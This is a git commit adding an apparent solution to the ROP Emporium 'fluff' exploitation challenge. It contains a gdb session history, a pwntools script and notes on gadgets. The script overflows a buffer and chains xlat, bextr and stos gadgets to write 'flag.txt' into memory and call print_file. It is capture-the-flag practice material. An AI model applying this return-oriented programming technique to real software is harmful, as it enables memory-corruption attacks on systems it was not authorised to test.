new file: x86_64/fluff/exploit.py

new file:   x86_64/fluff/gadgets
This commit is contained in:
Brett Weiland 2020-12-17 19:39:54 -06:00
parent 3f54969f58
commit 4c25bd9188
5 changed files with 332 additions and 0 deletions

Binary file not shown.

239
x86_64/fluff/.gdb_history Normal file
View File

@ -0,0 +1,239 @@
quit
quit
continue
nexti
nexti
info reg rdi
stepi
nexti
info reg rcx
nexti
info reg rbx
stepi
info reg rdx
inro reg rbx
info reg rbx
quit
stepi
continue
stepi
x rbx
info reg rbx
quit
conitnue
continue
stepi
info reg rbx
info reg rcx
quit
continue
stepi
info reg rbx
info reg rdx
quit
continue
stepi
info reg rbx
quit
continue
stepi
info reg rbx
quit
continue
stepi
info reg rbx
quit
continue
stepi
stepi
info reg rcx
stepi
info reg rbx
info reg rdx
quit
continue
stepi
info reg rbx
stepi
info reg rbx
quit
stepi
continue
stepi
info reg rbx
stepi
info reg rbx
quit
quit
continue
stepi
info reg rbx
quit
stepi
continue
stepi
info reg rbx
stepi
info reg rbx
quit
continue
stepi
info reg rbx
stepi
info reg rdx
quit
continue
stepi
info reg rbx
quit
continue
stepi
quit
continue
stepi
info reg rbx
quit
quit
continue
stepi
stepi
info reg rbp
stepi
info reg rax
stepi
info reg rax
stepi
info reg rdi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
q
continue
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
x/s 0x601be0
stepi
quit
conitnue
continue
continue
stepi
quit
x 0x0000000000400000
x/c 0x0000000000400000
x/c 0x00000000004003c4
x/c 0x0000000000400000
quit
continue
stepi
x/s 0x601be0
x/c 0x0000000000400251
stepi
stepi
x/s flag.txt
x/s 0x601be0
quit
watch *0x601be0 + 7
continue
x/s 0x601be0
continue
x/s 0x601be0
x/s 0x601be1
x/s 0x601be0
x/s 0x601be7
continue
x/s 0x601be7
x/s 0x601be0
continue
quit
watch *0x601be4
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s $rdi
x/s 0x601be0
quit
continue
x/s 0x601be0
quit
break *0x00000000004006a3
continue
context
stepi
x/s $rdi
stepi
quit
break *0x00000000004006a3
continue
context
c/s 0x7ffdf0faba10 - 8
x/s 0x7ffdf0faba10 - 8
x/s 0x7ffdf0faba10 - 4
x/s 0x7ffdf0faba10 - 16
x/x 0x7ffdf0faba10 - 8
x/x 0x7ffdf0faba10
x/x 0x7ffdf0faba10 = 4
x/x 0x7ffdf0faba10 - 4
x/x 0x7ffdf0faba10 + 4
context
info reg rdi
info reg rip
search
search 0x601be0
search --qword 0x601be0
search --qword 0x601be0 --writable
search --qword 0x0000000000400510 --writable
context
continue
stepi
continue
stepi
quit
break *0x00000000004006a3
continue
stepi
continue
x/i 0x400639
x/10i 0x400639
quit
break *0x400639
conitnue
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
quit
break *0x400639
continue
continue
x/s 0x601be0
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s 0x601be0
x/x 0x601be0 + 8
x/x 0x601be0 + 9
x/x 0x601be0 + 10
quit

BIN
x86_64/fluff/core Normal file

Binary file not shown.

49
x86_64/fluff/exploit.py Executable file
View File

@ -0,0 +1,49 @@
#!/usr/bin/env python3
from pwn import *
letter_lookups = {
'f' : 0x00000000004003c4,
'l' : 0x0000000000400239,
'a' : 0x00000000004003d6,
'g' : 0x00000000004003cf,
'.' : 0x0000000000400251,
't' : 0x0000000000400192,
'x' : 0x0000000000400246}
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
for c in string:
payload += p64(0x40062a)
payload += p64(0x4000) # if things go wrong, check endian/order
payload += p64(letter_lookups[c] - 0x3ef2)
payload += p64(0x0000000000400610)
payload += p64(0)
payload += p64(0x400628)
payload += p64(0x400639)
return(payload)
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()

44
x86_64/fluff/gadgets Normal file
View File

@ -0,0 +1,44 @@
Memory bytes information
=======================================================
0x00000000004003c4 : 'f'
0x0000000000400239 : 'l'
0x00000000004003d6 : 'a'
0x00000000004003cf : 'g'
0x0000000000400000 : '.'
0x0000000000400192 : 't'
0x0000000000400246 : 'x'
0x0000000000400192 : 't'
0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx
***
40062a: 5a pop rdx
40062b: 59 pop rcx
40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2
400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx
#rdx is controller.
rdx bits 0-7: starting bit
rdx bits 8-15: length
***
400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi
# requires rdi (check), al
0000000000400510 : print_file@plt
0x00000000004006a3 : pop rdi ; ret
exploit:
write to memory using al as letter
set al to zero
set rbx to memory location
rcx: (location - 0x3ef2) before bextr
rdx: 0x00 0x20 (from position zero, using 32 bits)